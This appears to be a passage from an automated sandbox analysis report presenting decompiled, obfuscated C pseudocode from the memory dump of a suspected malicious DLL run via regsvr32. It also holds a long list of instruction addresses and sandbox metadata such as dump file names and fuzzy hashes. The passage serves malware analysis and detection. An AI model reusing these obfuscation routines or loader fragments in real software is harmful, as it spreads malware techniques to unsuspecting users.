											_t4239 =  *0x6da8126c; // 0x0
											_t4242 =  *0x6da81264; // 0x0
											_t4244 =  *0x6da8126c; // 0x0
											_t1465 =  *0x6da8126c; // 0x0
											_t1468 =  *0x6da81264; // 0x0
											_t4251 =  *0x6da81268; // 0x0
											_t1470 =  *0x6da81268; // 0x0
											_t2830 =  *0x6da8126c; // 0x0
											_t1473 =  *0x6da8126c; // 0x0
											_t2832 =  *0x6da81268; // 0x0
											_t4263 =  *0x6da81268; // 0x0
											_t1475 =  *0x6da8126c; // 0x0
											_t4266 =  *0x6da8126c; // 0x0
											_t1477 =  *0x6da81268; // 0x0
											_t2844 =  *0x6da81268; // 0x0
											_t4268 =  *0x6da8126c; // 0x0
											_t2847 =  *0x6da8126c; // 0x0
											_t1484 = _a12(0, _t1477 *  *0x6da8125c *  *0x6da81260 + _t2832 *  *0x6da8125c *  *0x6da81260 + _t4251 *  *0x6da8125c *  *0x6da81260 + _v28 -  *0x6da81270 +  *0x6da81260 +  *0x6da8126c +  *0x6da81260 +  *0x6da81270 - _t1470 *  *0x6da81268 *  *0x6da8126c - _t2830 *  *0x6da81260 - _t1473 *  *0x6da8126c -  *0x6da81270 +  *0x6da81260 +  *0x6da8126c +  *0x6da81260 +  *0x6da81270 - _t4263 *  *0x6da81268 *  *0x6da8126c - _t1475 *  *0x6da81260 - _t4266 *  *0x6da8126c -  *0x6da81270 +  *0x6da81260 +  *0x6da8126c +  *0x6da81260 +  *0x6da81270 - _t2844 *  *0x6da81268 *  *0x6da8126c - _t4268 *  *0x6da81260 - _t2847 *  *0x6da8126c, 0x00002000 - _t1421 *  *0x6da8125c +  *0x6da81260 +  *0x6da81268 + _t4203 *  *0x6da81270 + _t1423 *  *0x6da81264 *  *0x6da81270 -  *0x6da81270 -  *0x6da81270 - _t4205 *  *0x6da81260 *  *0x6da8125c - _t1426 *  *0x6da8125c - _t4208 *  *0x6da81268 -  *0x6da81260 -  *0x6da81260 -  *0x6da8126c -  *0x6da8126c - _t1428 *  *0x6da81260 -  *0x6da81270 | _t4244 *  *0x6da81268 + _t1450 *  *0x6da81268 + _t4224 *  *0x6da81268 + _t1430 *  *0x6da81268 + 0x00001000 -  *0x6da81264 +  *0x6da8126c +  *0x6da81268 +  *0x6da8126c -  *0x6da81268 +  *0x6da8126c +  *0x6da8125c +  *0x6da8125c -  *0x6da81270 - _t4219 *  *0x6da81264 *  *0x6da8125c - _t4222 *  *0x6da8126c -  *0x6da81268 -  *0x6da81264 +  *0x6da8126c +  *0x6da81268 +  *0x6da8126c -  *0x6da81268 +  *0x6da8126c +  *0x6da8125c +  *0x6da8125c -  *0x6da81270 - _t1445 *  *0x6da81264 *  *0x6da8125c - _t1448 *  *0x6da8126c -  *0x6da81268 -  *0x6da81264 +  *0x6da8126c +  *0x6da81268 +  *0x6da8126c -  *0x6da81268 +  *0x6da8126c +  *0x6da8125c +  *0x6da8125c -  *0x6da81270 - _t4239 *  *0x6da81264 *  *0x6da8125c - _t4242 *  *0x6da8126c -  *0x6da81268 -  *0x6da81264 +  *0x6da8126c +  *0x6da81268 +  *0x6da8126c -  *0x6da81268 +  *0x6da8126c +  *0x6da8125c +  *0x6da8125c -  *0x6da81270 - _t1465 *  *0x6da81264 *  *0x6da8125c - _t1468 *  *0x6da8126c -  *0x6da81268, _t2800 *  *0x6da81270 + _t4181 *  *0x6da81270 + _t1414 + _t73 +  *0x6da81270 -  *0x6da81260 -  *0x6da8126c - _t4179 *  *0x6da8126c -  *0x6da8126c -  *0x6da81268 +  *0x6da81270 -  *0x6da81268 - _t1415 *  *0x6da8125c +  *0x6da81264 +  *0x6da81264 +  *0x6da81264 + _t1417 *  *0x6da8125c -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c +  *0x6da8126c +  *0x6da81270 -  *0x6da81260 -  *0x6da8126c - _t2798 *  *0x6da8126c -  *0x6da8126c -  *0x6da81268 +  *0x6da81270 -  *0x6da81268 - _t1419 *  *0x6da8125c +  *0x6da81264 +  *0x6da81264 +  *0x6da81264 + _t4201 *  *0x6da8125c -  *0x6da81260 +  *0x6da81264, _a32);
											_t4337 = _t4337 + 0x14;
											_v24 = _t1484;
											if(_v24 != 0) {
												goto L26;
											}
											return 0;
										}
										return 0;
									}
									return 0;
								}
								return 0;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x6da2a727
0x6da2a72e
0x6da2a735
0x6da2a748
0x6da2a777
0x6da2a785
0x6da2a7d0
0x6da2a7f7
0x6da2a82a
0x6da2a851
0x6da2a86d
0x6da2a872
0x6da2a877
0x6da2a883
0x6da2a8a3
0x6da2a8b8
0x6da2a8c6
0x6da2a8e7
0x6da2a926
0x6da2a93b
0x6da2a949
0x6da2a96a
0x6da2a9a9
0x6da2a9be
0x6da2a9cc
0x6da2a9ed
0x6da2aa2c
0x6da2aa41
0x6da2aa4f
0x6da2aa70
0x6da2aa9f
0x6da2aaab
0x6da2aab9
0x6da2aace
0x6da2aae9
0x6da2ab1e
0x6da2ab2d
0x6da2ab42
0x6da2ab51
0x6da2ab6c
0x6da2ab88
0x6da2ab9c
0x6da2abb7
0x6da2abeb
0x6da2abfa
0x6da2ac10
0x6da2ac1f
0x6da2ac3b
0x6da2ac57
0x6da2ac6c
0x6da2ac87
0x6da2acbc
0x6da2acca
0x6da2ace0
0x6da2acee
0x6da2ad0a
0x6da2ad4d
0x6da2ad81
0x6da2ada7
0x6da2adb6
0x6da2adc5
0x6da2ae0b
0x6da2ae3f
0x6da2ae66
0x6da2ae75
0x6da2ae83
0x6da2aec9
0x6da2aefc
0x6da2af23
0x6da2af31
0x6da2af40
0x6da2af5c
0x6da2af61
0x6da2af66
0x6da2af72
0x6da2af7b
0x6da2af8f
0x6da2afaa
0x6da2afbf
0x6da2afd6
0x6da2afd9
0x6da2afe6
0x6da2aff9
0x6da2b00c
0x6da2b04b
0x6da2b05a
0x6da2b07a
0x6da2b0b9
0x6da2b0c8
0x6da2b0e8
0x6da2b12c
0x6da2b13c
0x6da2b14f
0x6da2b16f
0x6da2b17d
0x6da2b1af
0x6da2b1bd
0x6da2b1cb
0x6da2b1eb
0x6da2b1f9
0x6da2b22b
0x6da2b239
0x6da2b247
0x6da2b267
0x6da2b275
0x6da2b2a7
0x6da2b2b7
0x6da2b2cb
0x6da2b2fe
0x6da2b318
0x6da2b34b
0x6da2b37d
0x6da2b398
0x6da2b3ca
0x6da2b3e1
0x6da2b3ec
0x6da2b3f7
0x6da2b402
0x6da2b40d
0x6da2b418
0x6da2b431
0x6da2b43c
0x6da2b447
0x6da2b452
0x6da2b45d
0x6da2b468
0x6da2b481
0x6da2b48a
0x6da2b48d
0x6da2b4a8
0x6da2b4b5
0x6da2b4d5
0x6da2b4f6
0x6da2b517
0x6da2b534
0x00000000
0x00000000
0x6da2b541
0x6da2b5f7
0x6da2b606
0x6da2b615
0x6da2b630
0x6da2b645
0x6da2b654
0x6da2b663
0x6da2b67e
0x6da2b693
0x6da2b547
0x6da2b556
0x6da2b56b
0x6da2b580
0x6da2b595
0x6da2b5aa
0x6da2b5bf
0x6da2b5d4
0x6da2b5e3
0x6da2b5e3
0x6da2b696
0x6da2b6ba
0x6da2b6eb
0x6da2b72a
0x6da2b744
0x6da2b767
0x6da2b799
0x6da2b7d7
0x6da2b7f5
0x6da2b810
0x6da2b82d
0x6da2b83c
0x6da2b84b
0x6da2b860
0x6da2b887
0x6da2b8a4
0x6da2b8b2
0x6da2b8c1
0x6da2b8d5
0x6da2b8ea
0x6da2b8ea
0x6da2b49c
0x6da2b4a5
0x6da2b4a5
0x6da2b8f2
0x6da2b905
0x6da2b910
0x6da2b921
0x6da2b933
0x6da2b944
0x6da2b94f
0x6da2b96e
0x6da2b979
0x6da2b983
0x6da2b98e
0x6da2b998
0x6da2b9b8
0x6da2b9c2
0x6da2b9cd
0x6da2b9d7
0x6da2b9e2
0x6da2b9ec
0x6da2b9f7
0x6da2ba01
0x6da2ba0c
0x6da2ba1d
0x6da2ba28
0x6da2ba39
0x6da2ba4b
0x6da2ba5c
0x6da2ba67
0x6da2ba86
0x6da2ba91
0x6da2ba9b
0x6da2baa6
0x6da2bab0
0x6da2bad0
0x6da2bada
0x6da2bae5
0x6da2baef
0x6da2bafa
0x6da2bb04
0x6da2bb0f
0x6da2bb19
0x6da2bb24
0x6da2bb35
0x6da2bb40
0x6da2bb51
0x6da2bb63
0x6da2bb74
0x6da2bb7f
0x6da2bb9e
0x6da2bba9
0x6da2bbb3
0x6da2bbbe
0x6da2bbc8
0x6da2bbe8
0x6da2bbf2
0x6da2bbfd
0x6da2bc07
0x6da2bc12
0x6da2bc1c
0x6da2bc27
0x6da2bc31
0x6da2bc3c
0x6da2bc4d
0x6da2bc58
0x6da2bc69
0x6da2bc7b
0x6da2bc8c
0x6da2bc97
0x6da2bcb6
0x6da2bcc1
0x6da2bccb
0x6da2bcd6
0x6da2bce0
0x6da2bd00
0x6da2bd0a
0x6da2bd15
0x6da2bd1f
0x6da2bd2a
0x6da2bd34
0x6da2bd3f
0x6da2bd49
0x6da2bd55
0x6da2bd5b
0x6da2bd8a
0x6da2bdab
0x6da2bdc5
0x6da2bdd4
0x6da2bde9
0x6da2be16
0x6da2be36
0x6da2be51
0x6da2be5f
0x6da2be75
0x6da2bea1
0x6da2bec2
0x6da2bedc
0x6da2beeb
0x6da2bf00
0x6da2bf2d
0x6da2bf4d
0x6da2bf68
0x6da2bf76
0x6da2bf8d
0x6da2bfbf
0x6da2bfcd
0x6da2bffa
0x6da2c009
0x6da2c035
0x6da2c044
0x6da2c071
0x6da2c07f
0x6da2c0ac
0x6da2c0bb
0x6da2c0e7
0x6da2c0f7
0x6da2c10b
0x6da2c126
0x6da2c135
0x6da2c144
0x6da2c17e
0x6da2c18d
0x6da2c1a3
0x6da2c1be
0x6da2c1d9
0x6da2c1e8
0x6da2c1f7
0x6da2c231
0x6da2c240
0x6da2c256
0x6da2c265
0x6da2c277
0x6da2c291
0x6da2c2ac
0x6da2c2c6
0x6da2c309
0x6da2c31d
0x6da2c332
0x6da2c359
0x6da2c374
0x6da2c389
0x6da2c38e
0x6da2c394
0x6da2c3a1
0x6da2c3a7
0x6da2c3ac
0x6da2c3b0
0x6da2c3d1
0x6da2c3f2
0x6da2c404
0x6da2c41a
0x6da2c440
0x6da2c463
0x6da2c495
0x6da2c4ab
0x6da2c4d1
0x6da2c4f4
0x6da2c526
0x6da2c53c
0x6da2c562
0x6da2c585
0x6da2c5b7
0x6da2c5cd
0x6da2c5f3
0x6da2c616
0x6da2c648
0x6da2c65e
0x6da2c684
0x6da2c6a7
0x6da2c6f0
0x6da2c70a
0x6da2c772
0x6da2c78c
0x6da2c7f4
0x6da2c80e
0x6da2c876
0x6da2c890
0x6da2c8f8
0x6da2c912
0x6da2c97a
0x6da2c994
0x6da2c9f1
0x6da2ca00
0x6da2ca21
0x6da2ca35
0x6da2ca4b
0x6da2ca59
0x6da2ca80
0x6da2ca8e
0x6da2caaf
0x6da2cac4
0x6da2cad9
0x6da2cae8
0x6da2cb09
0x6da2cb0c
0x6da2cb0f
0x6da2cb16
0x6da2d001
0x6da2d00c
0x6da2d01a
0x6da2d036
0x6da2d056
0x6da2d06b
0x6da2d088
0x6da2d096
0x6da2d0d6
0x6da2d0ec
0x6da2d10d
0x6da2d12a
0x6da2d14d
0x6da2d153
0x6da2d15e
0x6da2d170
0x6da2d17b
0x6da2d186
0x6da2d198
0x6da2d1a3
0x6da2d1ae
0x6da2d1b9
0x6da2d1e0
0x6da2d1eb
0x6da2d1f6
0x6da2d20f
0x6da2d21a
0x6da2d225
0x6da2d230
0x6da2d23b
0x6da2d246
0x6da2d251
0x6da2d25c
0x6da2d265
0x6da2d267
0x6da2d26a
0x6da2d55e
0x6da2d568
0x6da2d575
0x6da2d588
0x6da2d596
0x6da2d5a8
0x6da2d5af
0x6da2d5b8
0x6da2d5c1
0x6da2d5ca
0x6da2d5d3
0x6da2d5dc
0x6da2d5e5
0x6da2d5f7
0x6da2d612
0x6da2d638
0x6da2d653
0x6da2d67b
0x6da2d6d8
0x6da2d70b
0x6da2d734
0x6da2d791
0x6da2d7c5
0x6da2d7ee
0x6da2d84a
0x6da2d87e
0x6da2d8a6
0x6da2d903
0x6da2d936
0x6da2d95f
0x6da2d9bc
0x6da2d9e8
0x6da2d9fc
0x6da2da11
0x6da2da25
0x6da2da3a
0x6da2da49
0x6da2da4e
0x6da2da53
0x6da2da86
0x6da2da94
0x6da2dac1
0x6da2dacf
0x6da2dafc
0x6da2db0a
0x6da2db37
0x6da2db45
0x6da2db60
0x6da2db75
0x6da2db97
0x6da2dbac
0x6da2dbce
0x6da2dbe3
0x6da2dc1e
0x6da2dc2d
0x6da2dc61
0x6da2dc6f
0x6da2dca3
0x6da2dcb2
0x6da2dcd8
0x6da2dce7
0x6da2dd27
0x6da2dd3c
0x6da2dd7b
0x6da2dd90
0x6da2ddd0
0x6da2dde4
0x6da2de24
0x6da2de39
0x6da2de78
0x6da2de90
0x6da2de9c
0x6da2dea5
0x6da2dec5
0x6da2dee1
0x6da2defb
0x6da2df10
0x6da2df30
0x6da2df4c
0x6da2df66
0x6da2df7b
0x6da2df9b
0x6da2dfb7
0x6da2dfd1
0x6da2dfe6
0x6da2e006
0x6da2e022
0x6da2e03c
0x6da2e051
0x6da2e071
0x6da2e08d
0x6da2e0a7
0x6da2e0bc
0x6da2e0dc
0x6da2e0f8
0x6da2e112
0x6da2e127
0x6da2e147
0x6da2e163
0x6da2e17d
0x6da2e18f
0x6da2e19c
0x6da2e1aa
0x6da2e1b7
0x6da2e1c5
0x6da2e1d2
0x6da2e1e7
0x6da2e1f4
0x6da2e209
0x6da2e216
0x6da2e224
0x6da2e231
0x6da2e246
0x6da2e253
0x6da2e268
0x6da2e275
0x6da2e283
0x6da2e290
0x6da2e29e
0x6da2e2ab
0x6da2e2b9
0x6da2e2c6
0x6da2e2d4
0x6da2e2e8
0x6da2e2fd
0x6da2e30a
0x6da2e318
0x6da2e325
0x6da2e333
0x6da2e340
0x6da2e355
0x6da2e362
0x6da2e377
0x6da2e384
0x6da2e392
0x6da2e39f
0x6da2e3b4
0x6da2e3c1
0x6da2e3d6
0x6da2e3e3
0x6da2e3f1
0x6da2e3fe
0x6da2e40c
0x6da2e419
0x6da2e427
0x6da2e434
0x6da2e442
0x6da2e456
0x6da2e46e
0x6da2e473
0x6da2e478
0x6da2e47d
0x6da2e480
0x6da2e482
0x6da2e48e
0x6da2e491
0x6da2e493
0x6da2e498
0x6da2e49b
0x6da2e49d
0x6da2e4a2
0x6da2e4a5
0x6da2e4a7
0x6da2e4ac
0x6da2e4af
0x6da2e4b1
0x6da2e4cb
0x6da2e4ce
0x6da2e4d0
0x6da2e4dc
0x6da2e4df
0x6da2e4e1
0x6da2e4e6
0x6da2e4e9
0x6da2e4eb
0x6da2e4f0
0x6da2e4f3
0x6da2e4f5
0x6da2e4fa
0x6da2e4fd
0x6da2e4ff
0x6da2e504
0x6da2e507
0x6da2e509
0x6da2e50e
0x6da2e511
0x6da2e513
0x6da2e518
0x6da2e51b
0x6da2e51d
0x6da2e522
0x6da2e525
0x6da2e527
0x6da2e52c
0x6da2e52f
0x6da2e531
0x6da2e536
0x6da2e539
0x6da2e53b
0x6da2e540
0x6da2e543
0x6da2e545
0x6da2e54a
0x6da2e54d
0x6da2e54f
0x6da2e55b
0x6da2e55e
0x6da2e560
0x6da2e565
0x6da2e568
0x6da2e56a
0x6da2e56f
0x6da2e572
0x6da2e574
0x6da2e579
0x6da2e57c
0x6da2e57e
0x6da2e598
0x6da2e59b
0x6da2e59d
0x6da2e5a9
0x6da2e5ac
0x6da2e5ae
0x6da2e5b3
0x6da2e5b6
0x6da2e5b8
0x6da2e5bd
0x6da2e5c0
0x6da2e5c2
0x6da2e5c7
0x6da2e5ca
0x6da2e5cc
0x6da2e5d1
0x6da2e5d4
0x6da2e5d6
0x6da2e5db
0x6da2e5de
0x6da2e5e0
0x6da2e5e5
0x6da2e5e8
0x6da2e5ea
0x6da2e5ef
0x6da2e5f2
0x6da2e5f4
0x6da2e5f9
0x6da2e5fc
0x6da2e5fe
0x6da2e603
0x6da2e606
0x6da2e608
0x6da2e60d
0x6da2e610
0x6da2e612
0x6da2e617
0x6da2e61a
0x6da2e61c
0x6da2e628
0x6da2e62b
0x6da2e62d
0x6da2e632
0x6da2e635
0x6da2e637
0x6da2e63c
0x6da2e63f
0x6da2e641
0x6da2e646
0x6da2e649
0x6da2e64b
0x6da2e665
0x6da2e668
0x6da2e66a
0x6da2e676
0x6da2e679
0x6da2e67b
0x6da2e680
0x6da2e683
0x6da2e685
0x6da2e68a
0x6da2e68d
0x6da2e68f
0x6da2e694
0x6da2e697
0x6da2e699
0x6da2e69e
0x6da2e6a1
0x6da2e6a3
0x6da2e6a8
0x6da2e6ab
0x6da2e6ad
0x6da2e6b2
0x6da2e6b5
0x6da2e6b7
0x6da2e6bc
0x6da2e6bf
0x6da2e6c1
0x6da2e6c6
0x6da2e6c9
0x6da2e6cb
0x6da2e6d0
0x6da2e6d3
0x6da2e6d5
0x6da2e6da
0x6da2e6dd
0x6da2e6e4
0x6da2e6e7
0x6da2e6fc
0x6da2e706
0x6da2e711
0x6da2e71b
0x6da2e72d
0x6da2e737
0x6da2e749
0x6da2e753
0x6da2e75e
0x6da2e768
0x6da2e77a
0x6da2e78c
0x6da2e7a1
0x6da2e7b0
0x6da2e7c5
0x6da2e7d4
0x6da2e7e9
0x6da2e7f8
0x6da2e80d
0x6da2e821
0x6da2e826
0x6da2e82b
0x6da2e863
0x6da2e872
0x6da2e8b7
0x6da2e8c6
0x6da2e8e7
0x6da2e8ed
0x6da2e8f0
0x6da2f156
0x6da2e8f6
0x6da2e8f6
0x6da2e90d
0x6da2e92f
0x6da2e95d
0x6da2e978
0x6da2e987
0x6da2e9a3
0x6da2e9b2
0x6da2e9c1
0x6da2e9d6
0x6da2e9f8
0x6da2ea27
0x6da2ea41
0x6da2ea50
0x6da2ea6b
0x6da2ea7a
0x6da2ea89
0x6da2ea97
0x6da2eaa1
0x6da2eaba
0x6da2eacb
0x6da2ead6
0x6da2eae7
0x6da2eaf2
0x6da2eafc
0x6da2eb23
0x6da2eb2d
0x6da2eb3f
0x6da2eb49
0x6da2eb62
0x6da2eb6c
0x6da2eb77
0x6da2eb81
0x6da2eb9a
0x6da2ebab
0x6da2ebb6
0x6da2ebc7
0x6da2ebd2
0x6da2ebdc
0x6da2ec03
0x6da2ec0d
0x6da2ec1f
0x6da2ec29
0x6da2ec42
0x6da2ec4c
0x6da2ec57
0x6da2ec61
0x6da2ec7a
0x6da2ec8b
0x6da2ec96
0x6da2eca7
0x6da2ecb2
0x6da2ecbc
0x6da2ece3
0x6da2eced
0x6da2ecff
0x6da2ed09
0x6da2ed22
0x6da2ed2c
0x6da2ed37
0x6da2ed41
0x6da2ed5a
0x6da2ed6b
0x6da2ed76
0x6da2ed87
0x6da2ed92
0x6da2ed9c
0x6da2edc3
0x6da2edcd
0x6da2eddf
0x6da2ede9
0x6da2ee02
0x6da2ee0c
0x6da2ee17
0x6da2ee21
0x6da2ee3a
0x6da2ee4b
0x6da2ee56
0x6da2ee67
0x6da2ee72
0x6da2ee7c
0x6da2eea3
0x6da2eead
0x6da2eebf
0x6da2eec9
0x6da2eee2
0x6da2eeed
0x6da2eef2
0x6da2eef5
0x6da2ef10
0x6da2ef2b
0x6da2ef40
0x6da2ef56
0x6da2ef7d
0x6da2ef8c
0x6da2efa6
0x6da2efc1
0x6da2efd5
0x6da2efeb
0x6da2f011
0x6da2f020
0x6da2f03b
0x6da2f056
0x6da2f06b
0x6da2f081
0x6da2f0a8
0x6da2f0b6
0x6da2f0d1
0x6da2f0eb
0x6da2f100
0x6da2f115
0x6da2f13c
0x6da2f14e
0x6da2f14e
0x6da2f15d
0x6da2f169
0x6da2f17a
0x6da2f18c
0x6da2f196
0x6da2f1a1
0x6da2f1ab
0x6da2f1b6
0x6da2f1c7
0x6da2f1d9
0x6da2f1e3
0x6da2f1ee
0x6da2f1f8
0x6da2f203
0x6da2f214
0x6da2f226
0x6da2f230
0x6da2f23b
0x6da2f246
0x6da2f24b
0x6da2f250
0x6da2f25c
0x6da2f26a
0x6da2f274
0x6da2f286
0x6da2f290
0x6da2f29b
0x6da2f2a5
0x6da2f2b0
0x6da2f2ba
0x6da2f2c5
0x6da2f2d6
0x6da2f2e1
0x6da2f2eb
0x6da2f2f6
0x6da2f300
0x6da2f30b
0x6da2f315
0x6da2f327
0x6da2f331
0x6da2f33c
0x6da2f346
0x6da2f352
0x6da2f357
0x6da2f35c
0x6da2f368
0x6da2f376
0x6da2f381
0x6da2f38c
0x6da2f397
0x6da2f3a2
0x6da2f3ad
0x6da2f3b8
0x6da2f3d1
0x6da2f3dc
0x6da2f3e7
0x6da2f3f2
0x6da2f3fd
0x6da2f40f
0x6da2f421
0x6da2f43a
0x6da2f44c
0x6da2f457
0x6da2f462
0x6da2f474
0x6da2f486
0x6da2f491
0x6da2f49c
0x6da2f4a7
0x6da2f4b2
0x6da2f4bd
0x6da2f4c8
0x6da2f4d3
0x6da2f4de
0x6da2f4f7
0x6da2f502
0x6da2f50d
0x6da2f518
0x6da2f523
0x6da2f535
0x6da2f547
0x6da2f560
0x6da2f572
0x6da2f57d
0x6da2f588
0x6da2f59a
0x6da2f5ac
0x6da2f5b8
0x6da2f5bd
0x6da2f5c2
0x6da2f5d7
0x6da2fa6f
0x6da2fa76
0x00000000
0x6da2fa76
0x6da2f5e4
0x6da2f647
0x6da2f65b
0x6da2f671
0x6da2f6b1
0x6da2f6cd
0x6da2f6f9
0x6da2f70e
0x6da2f723
0x6da2f764
0x6da2f77f
0x6da2f7ac
0x6da2f7c0
0x6da2f7d6
0x6da2f816
0x6da2f832
0x6da2f85e
0x6da2f873
0x6da2f888
0x6da2f8c9
0x6da2f8e4
0x6da2f911
0x6da2f925
0x6da2f93b
0x6da2f97b
0x6da2f997
0x6da2f9c3
0x6da2f9d8
0x6da2f9ed
0x6da2fa2e
0x6da2fa49
0x6da2fa67
0x6da2f5e6
0x6da2f615
0x6da2f61e
0x6da2f61e
0x00000000
0x6da2fa6a
0x00000000
0x6da2f5c4
0x00000000
0x6da2f252
0x6da2fa7b
0x6da2fa7f
0x00000000
0x6da2fa87
0x6da2f250
0x00000000
0x6da2e82d
0x00000000
0x6da2da55
0x6da2d274
0x6da2d281
0x6da2d287
0x6da2d28e
0x6da2d29d
0x6da2d2ac
0x6da2d2bb
0x6da2d2e3
0x6da2d2f1
0x6da2d306
0x6da2d315
0x6da2d323
0x6da2d332
0x6da2d359
0x6da2d368
0x6da2d37d
0x6da2d38b
0x6da2d39a
0x6da2d3a8
0x6da2d3d0
0x6da2d3df
0x6da2d3f3
0x6da2d402
0x6da2d411
0x6da2d420
0x6da2d448
0x6da2d456
0x6da2d46b
0x6da2d47a
0x6da2d488
0x6da2d497
0x6da2d4be
0x6da2d4cd
0x6da2d4e2
0x6da2d4f0
0x6da2d4ff
0x6da2d50d
0x6da2d535
0x6da2d54b
0x00000000
0x6da2d551
0x6da2cb20
0x6da2cb26
0x6da2cb2b
0x6da2cb41
0x6da2cb68
0x6da2cb82
0x6da2cb97
0x6da2cbcf
0x6da2cbf6
0x6da2cc10
0x6da2cc25
0x6da2cc41
0x6da2cc60
0x6da2cc6f
0x6da2cc90
0x6da2cca6
0x6da2ccb4
0x6da2ccdb
0x6da2cd1e
0x6da2cd38
0x6da2cd4e
0x6da2cd8d
0x6da2cda8
0x6da2cdbd
0x6da2cdfb
0x6da2ce15
0x6da2ce2b
0x6da2ce6a
0x6da2ce85
0x6da2ce9a
0x6da2cecc
0x6da2cee8
0x6da2cefd
0x6da2cf0c
0x6da2cf32
0x6da2cf4e
0x6da2cf64
0x6da2cf72
0x6da2cf99
0x6da2cfb4
0x6da2cfca
0x6da2cfd9
0x6da2cfeb
0x6da2cfee
0x6da2cff1
0x6da2cff8
0x00000000
0x00000000
0x00000000
0x6da2cffa
0x00000000
0x6da2c396
0x00000000
0x6da2b3cc
0x00000000
0x6da2b2b9
0x00000000
0x6da2b12e
0x00000000
0x6da2af68
0x00000000
0x6da2aaa1
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04bb8b1f7244aba12681baff2f6f8f9ee22780a2d29e26bfafa4796d906c88b
Instruction ID: c968dfcc1a2138926ab5e3f6a09bf6babce0ff878a3e4ca68f08036fe0186126
Opcode Fuzzy Hash: f04bb8b1f7244aba12681baff2f6f8f9ee22780a2d29e26bfafa4796d906c88b
Instruction Fuzzy Hash: 88B3A27650D3018FCB08DE2CCAD5B75F7B6F3A7356B85C6299821C6298F730A416CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 1001D14C Relevance: 10.3, Strings: 8, Instructions: 259
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E1001D14C() {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				void* _t273;
				void* _t275;
				intOrPtr _t284;
				intOrPtr _t287;
				void* _t291;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				void* _t301;
				intOrPtr _t319;
				void* _t327;
				unsigned int* _t331;

				_t331 =  &_v124;
				_v120 = 0x624c91;
				_v120 = _v120 + 0xffffb79e;
				_v120 = _v120 + 0xffffeea3;
				_v120 = _v120 * 0x49;
				_t291 = 0;
				_v120 = _v120 ^ 0x1bee3de2;
				_t327 = 0x7483d93;
				_v32 = 0x56c57f;
				_t293 = 0x61;
				_v32 = _v32 / _t293;
				_v32 = _v32 ^ 0x0000e501;
				_v108 = 0xf14852;
				_v108 = _v108 >> 0xf;
				_t294 = 0x59;
				_v108 = _v108 / _t294;
				_v108 = _v108 ^ 0x0428124e;
				_v108 = _v108 ^ 0x0428124b;
				_v104 = 0xa6b67b;
				_v104 = _v104 + 0xffffb27a;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0xdd20ff05;
				_v104 = _v104 ^ 0xbbafaf05;
				_v12 = 0x790b0a;
				_v12 = _v12 ^ 0x4362e991;
				_v12 = _v12 ^ 0x431be29b;
				_v124 = 0x41634d;
				_v124 = _v124 | 0xf0d2b24c;
				_t295 = 0xe;
				_v124 = _v124 * 0x3a;
				_v124 = _v124 >> 8;
				_v124 = _v124 ^ 0x009b13fa;
				_v52 = 0x730875;
				_v52 = _v52 ^ 0x9ffb935c;
				_v52 = _v52 ^ 0x9f828798;
				_v88 = 0x632645;
				_v88 = _v88 << 3;
				_v88 = _v88 << 0xf;
				_v88 = _v88 ^ 0x991bfe0c;
				_v48 = 0xc61cd8;
				_v48 = _v48 | 0x82f4fb89;
				_v48 = _v48 ^ 0x82f25eac;
				_v80 = 0x924365;
				_v80 = _v80 << 2;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x000bd14c;
				_v40 = 0xd09e4b;
				_v40 = _v40 | 0x7d391cbd;
				_v40 = _v40 ^ 0x7dfd08b4;
				_v44 = 0x570279;
				_v44 = _v44 | 0xe5e84631;
				_v44 = _v44 ^ 0xe5f51bcf;
				_v84 = 0x1e9880;
				_v84 = _v84 | 0x39927ed1;
				_v84 = _v84 >> 1;
				_v84 = _v84 ^ 0x1cc48729;
				_v72 = 0xb37301;
				_v72 = _v72 ^ 0x18bf9fbc;
				_v72 = _v72 / _t295;
				_v72 = _v72 ^ 0x01b7f2f6;
				_v36 = 0x769cba;
				_v36 = _v36 + 0xffff6ff0;
				_v36 = _v36 ^ 0x007d44a7;
				_v76 = 0x897864;
				_t296 = 0x18;
				_v76 = _v76 * 0x3f;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x5042e57a;
				_v24 = 0xabdb5d;
				_v24 = _v24 + 0xffffbdbd;
				_v24 = _v24 ^ 0x00a11d6a;
				_v28 = 0x55f977;
				_v28 = _v28 + 0xffff451a;
				_v28 = _v28 ^ 0x00528fd7;
				_v116 = 0xd050e7;
				_v116 = _v116 ^ 0xee9aef5d;
				_v116 = _v116 + 0xffffd3af;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0xdc9f7c50;
				_v16 = 0xb21503;
				_v16 = _v16 / _t296;
				_v16 = _v16 ^ 0x00057f28;
				_v68 = 0x2a0218;
				_v68 = _v68 | 0x5bd7e55e;
				_v68 = _v68 ^ 0x5bf85094;
				_v112 = 0x37ea;
				_v112 = _v112 | 0x78377de9;
				_v112 = _v112 + 0x12a2;
